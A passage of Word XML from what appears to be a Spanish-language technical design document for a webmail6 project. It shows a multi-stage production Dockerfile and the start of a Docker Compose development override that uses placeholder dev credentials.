        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">corepack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prepare pnpm@9.15.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--activate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> package.json pnpm-workspace.yaml tsconfig.base.json ./</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/shared/package.json packages/shared/tsconfig.json ./packages/shared/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/api/package.json packages/api/tsconfig.json ./packages/api/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--frozen-lockfile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/shared/src ./packages/shared/src</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/api/src ./packages/api/src</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> @webmail6/shared build</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> @webmail6/api build</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stage 3: Production</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> node:22-slim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> production</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WORKDIR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Security hardening</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wget ca-certificates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groupadd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useradd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail webmail</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Copiar solo lo necesario</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--from=deps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/node_modules ./node_modules</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--from=deps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/packages/shared/node_modules ./packages/shared/node_modules</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--from=deps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/packages/api/node_modules ./packages/api/node_modules</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--from=builder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/packages/shared/dist ./packages/shared/dist</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--from=builder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/packages/shared/package.json ./packages/shared/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--from=builder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/packages/api/dist ./packages/api/dist</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--from=builder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/packages/api/package.json ./packages/api/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> package.json pnpm-workspace.yaml ./</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scripts de seed y migración</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/api/scripts ./packages/api/scripts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Health check</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">HEALTHCHECK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--interval=15s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--timeout=5s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--start-period=30s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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--spider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost:3000/health/live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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPOSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail</w:t>
      </w:r>
      <w:r>
        <w:br/>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"packages/api/dist/index.js"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="223"/>
    <w:bookmarkStart w:id="224" w:name="docker-compose-dev-vs-prod"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.2.3 Docker Compose Dev vs Prod</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># docker-compose.override.yml (desarrollo local)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>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target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> builder</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pnpm --filter @webmail6/api dev</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NODE_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> development</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LOG_LEVEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> debug</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MONGODB_URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongodb://admin:devpass@mongo:27017/webmail6?authSource=admin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">REDIS_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redis://redis:6379</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dev-jwt-secret-change-in-production</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0000000000000000000000000000000000000000000000000000000000000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SEAWEEDFS_ENDPOINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://seaweedfs:8333</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FRONTEND_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://localhost:5173</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"3000:3000"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./packages/api/src:/app/packages/api/src:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./packages/shared/src:/app/packages/shared/src:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/web/Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> builder</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pnpm --filter @webmail6/web dev --host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NODE_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> development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"5173:5173"</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./packages/web/src:/app/packages/web/src:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./packages/shared/src:/app/packages/shared/src:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>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profiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
